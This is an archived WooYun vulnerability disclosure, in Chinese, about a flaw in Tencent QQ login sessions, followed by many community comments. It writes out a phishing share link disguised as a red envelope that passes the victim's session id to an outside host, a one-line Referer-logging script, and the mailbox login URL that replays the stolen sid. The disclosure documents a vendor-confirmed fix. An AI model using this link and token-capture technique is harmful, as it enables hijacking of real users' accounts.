当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172586

漏洞标题:我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

相关厂商:腾讯

漏洞作者: 路人甲

提交时间:2016-01-25 15:03

修复时间:2016-03-10 16:42

公开时间:2016-03-10 16:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-25: 细节已通知厂商并且等待厂商处理中
2016-01-25: 厂商已经确认,细节仅向厂商公开
2016-02-04: 细节向核心白帽子及相关领域专家公开
2016-02-14: 细节向普通白帽子公开
2016-02-24: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)

详细说明:

http://connect.qq.com/widget/shareqq/index.html?url=http://jump.qt.qq.com/php/jump/check_url/?url=http://jieshousid.com/f.php&desc=&title=&summary=&pics=https://mqq-imgcache.gtimg.cn/res/mqq/hongbao/img/message_logo_100.png&flash=&site=&style=201&width=32&height=32


这个可以自行构造更具诱惑的链接
如:

KTMZ$6W[P($I]4}AHV$T~UL.jpg


脚本f.php

$_SERVER['HTTP_REFERER'];

获取Referer

EABDDD1F-9E8E-474E-8731-5017E117DC5B.png


得到sid 构造如下链接即可进入qq邮箱:
http://w.mail.qq.com/cgi-bin/login?3g_sid=获取到的sid&3g_style=1&fun=from3g

EA403B49-3FC4-40FC-A153-E33EDF8DDBAF.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-25 18:09

厂商回复:

感谢乌云漏洞平台的反馈,我们已经确认该漏洞并非为QQ红包的漏洞,而是手Q登陆态的一个安全漏洞,通过一个构造好的恶意连接可以获取用户登陆态,我们会尽快修复。感谢乌云漏洞平台一直以来的关注和支持。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-25 15:40 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    最近腾讯邮箱各种坑啊

  2. 2016-01-25 15:41 | 咸鱼翻身 ( 普通白帽子 | Rank:620 漏洞数:117 )

    果然又见双投啊。。。。

  3. 2016-01-25 15:44 | Submit ( 普通白帽子 | Rank:535 漏洞数:122 | )

    双投 ,补天奖金是不打算要了吗

  4. 2016-01-25 15:45 | 随风的风 ( 普通白帽子 | Rank:219 漏洞数:78 | 微信公众号:233sec 不定期分享各种漏洞思...)

    双投。。草

  5. 2016-01-25 15:48 | 泪雨无魂 ( 普通白帽子 | Rank:229 漏洞数:59 )

    双投的节奏啊。。。

  6. 2016-01-25 15:49 | hkAssassin ( 普通白帽子 | Rank:377 漏洞数:70 | 我是一只毛毛虫。)

    哈哈,绝对双投

  7. 2016-01-25 15:49 | 毛泽车 ( 路人 | Rank:27 漏洞数:10 | 同志们,安全,是要全国人民一起努力的,奋...)

    为了装逼上首页,奖金不打算要了。还是太年轻

  8. 2016-01-25 15:50 | 孤梦° ( 实习白帽子 | Rank:51 漏洞数:13 | 要有最朴素的生活,与最遥远的梦想.)

    双投 补天直接给一w

  9. 2016-01-25 15:51 | 法官 ( 路人 | Rank:4 漏洞数:3 | Seven QQ94170844)

    @疯狗 http://loudong.360.cn/vul/info/qid/QTVA-2016-368828

  10. 2016-01-25 15:51 | Manning ( 普通白帽子 | Rank:928 漏洞数:120 | https://github.com/manning23/MSpider)

    哈哈,双

  11. 2016-01-25 15:52 | cwkiller ( 路人 | Rank:32 漏洞数:15 | cwkiller)

    1W直接扔了?不要?

  12. 2016-01-25 15:53 | 田老板 ( 路人 | Rank:8 漏洞数:4 | 学校杀手)

    双投啊-- 双投 你比单投多一投 双投啊-- 双投 你比三投少一投

  13. 2016-01-25 15:55 | 暴走 ( 普通白帽子 | Rank:518 漏洞数:96 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    和这个有什么区别吗,http://loudong.360.cn/vul/info/qid/QTVA-2016-368828

  14. 2016-01-25 15:59 | 路人毛 ( 实习白帽子 | Rank:66 漏洞数:27 | 个人主页:www.sqler.cn)

    一万块钱都不要了。屌!

  15. 2016-01-25 16:02 | 随风的风 ( 普通白帽子 | Rank:219 漏洞数:78 | 微信公众号:233sec 不定期分享各种漏洞思...)

    腾讯罕见的没有秒回复。。。这是要忽略的节奏。哈哈

  16. 2016-01-25 16:05 | 键盘手 ( 路人 | Rank:10 漏洞数:3 | 不会编程的黑客不是高富帅)

    亮了

  17. 2016-01-25 16:06 | k0_pwn ( 实习白帽子 | Rank:96 漏洞数:13 | 专注且自由)

    这双投差评。。

  18. 2016-01-25 16:06 | Henry3II ( 实习白帽子 | Rank:47 漏洞数:12 | ...........................................)

    洞主看了补天和乌云的评论笑了笑:别人给的钱乃身外之物ㄟ( ▔, ▔ )ㄏ

  19. 2016-01-25 16:07 | k0_pwn ( 实习白帽子 | Rank:96 漏洞数:13 | 专注且自由)

    不过不取消的话,一会忽略就能看细节了,2333

  20. 2016-01-25 16:10 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:1029 漏洞数:74 | 我爱吃北京方便面)

    看来钱不是万能的

  21. 2016-01-25 16:13 | water ( 普通白帽子 | Rank:369 漏洞数:107 | If you have one, then we have more than ...)

    说不定是有人看到补天的,然后迅速挖掘了漏洞提交到了wooyun呢?

  22. 2016-01-25 16:15 | 紧肛互撸娃 ( 路人 | Rank:7 漏洞数:4 | 互撸娃互撸娃紧肛互撸娃)

    CCTV看这里

  23. 2016-01-25 16:18 | 泳少 ( 普通白帽子 | Rank:233 漏洞数:81 | ★ 梦想这条路踏上了,跪着也要...)

    利益最大化

  24. 2016-01-25 16:19 | 子墨 ( 普通白帽子 | Rank:264 漏洞数:29 | 天地不仁,以万物为刍狗;圣人不仁,以百姓为...)

    没闪电的话估计就soso

  25. 2016-01-25 16:20 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    我估计不太可能像双投。。。可能被人挖出来了。。

  26. 2016-01-25 16:26 | sauce ( 实习白帽子 | Rank:73 漏洞数:16 | 普通白帽是要rank到100吗 努力挖洞。。。)

    卧槽 利益与情怀并存

  27. 2016-01-25 16:32 | 红客十年 ( 普通白帽子 | Rank:376 漏洞数:78 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    我就是特地来补天看双投的

  28. 2016-01-25 16:38 | 色豹 ( 路人 | Rank:8 漏洞数:3 )

    腾讯罕见的没有秒回复,说明要忽略了,然而补天定价1w。不双头1w到手了

  29. 2016-01-25 16:39 | 色豹 ( 路人 | Rank:8 漏洞数:3 )

    @红客十年 你特么走错了 这里是乌云

  30. 2016-01-25 16:47 | 风情万种 ( 普通白帽子 | Rank:193 漏洞数:65 | 不再相信爱了)

    好屌

  31. 2016-01-25 16:48 | 带我玩 ( 路人 | Rank:14 漏洞数:7 | 带我玩)

    感觉好牛逼的

  32. 2016-01-25 16:49 | 大梦 ( 路人 | Rank:4 漏洞数:3 )

    毛线双投 两个人挖到的不行啊

  33. 2016-01-25 17:05 | 隔壁老三 ( 实习白帽子 | Rank:87 漏洞数:22 | 找工作啊啊啊啊啊)

    这两个人好友默契

  34. 2016-01-25 17:15 | 齐迹 ( 普通白帽子 | Rank:802 漏洞数:103 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    这又是要sibi的节奏了

  35. 2016-01-25 17:18 | 路人毛 ( 实习白帽子 | Rank:66 漏洞数:27 | 个人主页:www.sqler.cn)

    @红客十年 大胸弟,你走错片场了,补天在浏览器右上角

  36. 2016-01-25 17:26 | 猫和老鼠 ( 路人 | Rank:8 漏洞数:4 | ...)

    @大梦 原来你就是洞主啊,亮了。求爆大号

  37. 2016-01-25 17:30 | xsser 认证白帽子 ( 普通白帽子 | Rank:282 漏洞数:21 | 当我又回首一切,这个世界会好吗?)

    做好自己

  38. 2016-01-25 17:39 | 大梦 ( 路人 | Rank:4 漏洞数:3 )

    @猫和老鼠 明显不是

  39. 2016-01-25 17:43 | S4kur4 ( 实习白帽子 | Rank:80 漏洞数:17 | 你有本事开门啊!)

    看起来好像很有趣的样子

  40. 2016-01-25 17:49 | Format_smile ( 普通白帽子 | Rank:352 漏洞数:134 | ···孰能无过,谁是谁非!)

    洞主土豪 双投

  41. 2016-01-25 17:52 | 奈何彼岸 ( 实习白帽子 | Rank:94 漏洞数:44 | 乌云一下你就知道)

    来晚了

  42. 2016-01-25 17:52 | 红客十年 ( 普通白帽子 | Rank:376 漏洞数:78 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    @路人毛 真的跑错地方了……骚瑞。。。

  43. 2016-01-25 17:53 | 红客十年 ( 普通白帽子 | Rank:376 漏洞数:78 | 去年离职富士康,回到家中上蓝翔,蓝翔毕业...)

    @色豹 骚瑞。。。导航给带偏了

  44. 2016-01-25 18:00 | solitary ( 路人 | Rank:13 漏洞数:5 | 菜的抠脚!)

    牛逼

  45. 2016-01-25 18:30 | 浩天 认证白帽子 ( 核心白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    我喜欢这句:感谢乌云漏洞平台一直以来的关注和支持。

  46. 2016-01-25 18:31 | 偶然 ( 普通白帽子 | Rank:306 漏洞数:82 | 我是天空里一片云。)

    我喜欢这句:感谢白帽子一直以来的关注和支持。

  47. 2016-01-25 18:31 | 撸撸侠 ( 普通白帽子 | Rank:949 漏洞数:100 | 我是撸撸侠)

    我喜欢这句:感谢乌云漏洞平台一直以来的关注和支持。

  48. 2016-01-25 18:32 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    我喜欢这句:感谢乌云漏洞平台一直以来的关注和支持。

  49. 2016-01-25 18:33 | 玄道 ( 实习白帽子 | Rank:64 漏洞数:23 | .-..-.-.-.-.-)

    可以的 一洞多提,还是双投 这一万不要了 66666

  50. 2016-01-25 18:44 | 浩天 认证白帽子 ( 核心白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    当前案例是两个漏洞,不知道腾讯看出来没

  51. 2016-01-25 19:08 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @腾讯 两个点都有问题 白帽子利用的复杂了 注意仔细看

  52. 2016-01-25 19:25 | 伏地魔 ( 实习白帽子 | Rank:34 漏洞数:7 )

    洞主,我给一百你告诉我漏洞细节好吗?哈哈哈

  53. 2016-01-25 20:47 | 沦沦 ( 普通白帽子 | Rank:611 漏洞数:141 | 爱老婆,爱生活|脚步不能停要一直向上走)

    http://zone.wooyun.org/content/25155

  54. 2016-01-25 20:59 | 土狗哥 ( 路人 | Rank:2 漏洞数:1 | 初生狗犊,乱咬人)

    搏一搏单车变摩托啊,一万变几万,有胆识

  55. 2016-01-25 21:19 | 李小弟 ( 路人 | Rank:1 漏洞数:1 | \-)(-/)

    小心那个都不给钱。。骚年别贪,我都等领完钱后发乌云。大洋没到账,先不发乌云。。毕竟是血汗钱,没办法。

  56. 2016-01-25 21:44 | 欧冠狂魔阿森纳 ( 实习白帽子 | Rank:38 漏洞数:14 | 静静的看你们装逼)

    6666

  57. 2016-01-25 21:55 | 神话般的孩纸 ( 路人 | Rank:25 漏洞数:9 | 少年放下鼠标,一起去拯救世界!)

    利益与情怀并存,洞主果断选择了情怀

  58. 2016-01-25 22:22 | 圣路西法 ( 路人 | Rank:22 漏洞数:8 | 围观大神ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)

    情怀价值1万块。

  59. 2016-01-26 11:15 | 刘洪泽 ( 普通白帽子 | Rank:149 漏洞数:37 | GOGOGO)

    洞主一定是不缺一万,在利益面前选择了情怀.....

  60. 2016-01-26 15:41 | 我在不想理你 ( 路人 | Rank:22 漏洞数:10 | 人生路漫漫)

    架锅

  61. 2016-01-26 21:34 | echotxl ( 路人 | Rank:8 漏洞数:4 | 我是一枚纯粹的业余菜鸟。。。)

    能不能玩一会在发

  62. 2016-01-27 19:14 | 空心 ( 路人 | Rank:12 漏洞数:6 | 推动开源 推动网络安全)

    上次那个汽车解锁不也是双投吗 反正我是没看见双投被处理的

  63. 2016-02-01 13:07 | Time_泽~少 ( 路人 | Rank:11 漏洞数:6 | 计算机专业/网络安全技术)

    感觉不是双投,有人去挖出来的。